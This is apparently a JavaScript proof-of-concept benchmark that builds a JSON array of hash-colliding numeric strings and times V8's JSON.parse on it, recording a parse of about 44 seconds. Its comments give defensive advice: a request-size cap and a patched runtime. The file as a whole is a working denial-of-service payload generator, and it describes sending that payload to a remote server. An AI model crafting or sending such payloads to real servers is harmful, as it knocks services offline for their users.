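// Benchmark: time JSON.parse() on a JSON array of numeric strings whose
// internalization in V8's string table collides (per the page's description).
// For defenders, the point is that the cost is paid inside JSON.parse() itself,
// before any application-level validation of the parsed value can run. Limits
// therefore have to be applied earlier (for example a request-body size cap),
// and the runtime should be checked for a release that fixes this behaviour.

const NS_PER_SEC = 1e9;
const payload = [];
const val = 1234;
const MOD = 2 ** 19;
const CHN = 2 ** 17; // chain length
const REP = 2 ** 17; // repetitions of the target value

// Build the quadratic probing chain
let j = val + MOD;
for (let i = 1; i < CHN; i++) {
  payload.push(`${j}`);
  j = (j + i) % MOD;
}

// Repeat the target value to force lookups through the chain
for (let k = 0; k < REP; k++) {
  payload.push(`${val}`);
}

// On the client side: attacker crafts an adversarial JSON payload
// and sends it to the remote server.
// Note: string.length counts UTF-16 code units; the payload is pure ASCII,
// so it equals the byte size here.
const string = JSON.stringify({ data: payload });
console.log(`Payload size: ${string.length} bytes`, string);

// On the server side: V8 inserts the numeric strings in a hash table
// for internalization, the collisions lead to extreme amplification
// in resource consumption.
// The timer starts here so that the figure covers only the parse, not the
// payload construction or the console output above.
const time = process.hrtime();
JSON.parse(string);
const diff = process.hrtime(time);

console.log(`Benchmark took ${diff[0] * NS_PER_SEC + diff[1]} nanoseconds`);
// Author's recorded run (taken with the timer started at the top of the script):
// Benchmark took 44357317375 nanoseconds
// 44.3573174 seconds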